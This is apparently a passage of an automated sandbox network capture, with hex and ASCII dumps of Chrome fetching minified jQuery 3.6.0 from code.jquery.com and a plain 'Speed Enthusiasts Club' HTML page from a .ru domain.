                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                        2024-10-02 15:15:46 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                        2024-10-02 15:15:46 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                        2024-10-02 15:15:46 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.460342188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:46 UTC340OUTGET // HTTP/1.1
                                                                                        Host: kushbluntzgi.ru
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:47 UTC668INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlIxd0bTkWqAEUNwzOI91LpdVLOz9mGIyfIGCoql8RNKhAipyrpa6F%2Bf57iYcm9VOmmoO27Zv8kY6TVOG5I3nJJ7%2F5ckTwD9Mx7dLMnBztls5yE%2FZSwp2MZmEIXwaWHZNvM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a65a19555e70-EWR
                                                                                        2024-10-02 15:15:47 UTC701INData Raw: 31 61 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 70 65 65 64 20 45 6e 74 68 75 73 69 61 73
                                                                                        Data Ascii: 1a25<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Speed Enthusias
                                                                                        2024-10-02 15:15:47 UTC1369INData Raw: 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 53 70 65 65 64 20 45 6e 74 68 75 73 69 61 73 74 73 20 43 6c 75 62 20 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76 62 61 72 52 65 73 70 6f 6e 73 69 76 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6e 61 76 62 61 72 52 65 73 70 6f 6e 73 69 76 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74
                                                                                        Data Ascii: ss="fas fa-car"></i> Speed Enthusiasts Club </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigat
                                                                                        2024-10-02 15:15:47 UTC1369INData Raw: 28 27 68 74 74 70 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 2d 4c 4f 62 64 41 6a 64 42 4e 41 57 31 67 39 77 5a 31 66 4d 43 67 48 61 45 4b 27 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 33 22 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 53 70 65 65 64 20 45 6e 74 68 75 73 69 61 73 74 73 20 43 6c 75 62 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 59 6f 75 72 20 75 6c 74 69 6d 61 74 65 20
                                                                                        Data Ascii: ('https://th.bing.com/th/id/OIP.-LObdAjdBNAW1g9wZ1fMCgHaEK'); background-size: cover; background-position: center;"> <div class="container"> <h1 class="display-3">Welcome to Speed Enthusiasts Club</h1> <p class="lead">Your ultimate
                                                                                        2024-10-02 15:15:47 UTC1369INData Raw: 73 3d 22 70 79 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 69 6d 67 2d 74 6f 70 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 52 6d 70 76 6e 43 49 35 30 72 31 6f 42 4c 2d 32 47 2d
                                                                                        Data Ascii: s="py-5 text-center"> <div class="container"> <div class="row"> <div class="col-lg-4 mb-4"> <div class="card"> <img class="card-img-top" src="https://th.bing.com/th/id/OIP.RmpvnCI50r1oBL-2G-
                                                                                        2024-10-02 15:15:47 UTC1369INData Raw: 72 69 6d 61 72 79 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 22 3e 3c 2f 69 3e 20 52 65 61 64 20 4d 6f 72 65 3c 2f 61 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 69 6d 67 2d 74 6f 70 22
                                                                                        Data Ascii: rimary"><i class="fas fa-chevron-right"></i> Read More</a> </div> </div> </div> <div class="col-lg-4 mb-4"> <div class="card"> <img class="card-img-top"
                                                                                        2024-10-02 15:15:47 UTC524INData Raw: 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 75 73 68 62 6c 75 6e 74 7a 67 69 2e 72 75 2f 23 74 65 72 6d 73 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 6c 69 67 68 74 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 66 69 6c 65 2d 63 6f 6e 74 72 61 63 74 22 3e 3c 2f 69 3e 20 54 65 72 6d 73 3c 2f 61 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 75 73 68 62 6c 75 6e
                                                                                        Data Ascii: class="list-inline-item"> <a href="https://kushbluntzgi.ru/#terms" class="text-light"><i class="fas fa-file-contract"></i> Terms</a> </li> <li class="list-inline-item"> <a href="https://kushblun
                                                                                        2024-10-02 15:15:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.460344151.101.66.1374433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:46 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:46 UTC613INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 1833117
                                                                                        Date: Wed, 02 Oct 2024 15:15:46 GMT
                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740032-EWR
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 5889, 0
                                                                                        X-Timer: S1727882147.922667,VS0,VE1
                                                                                        Vary: Accept-Encoding
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
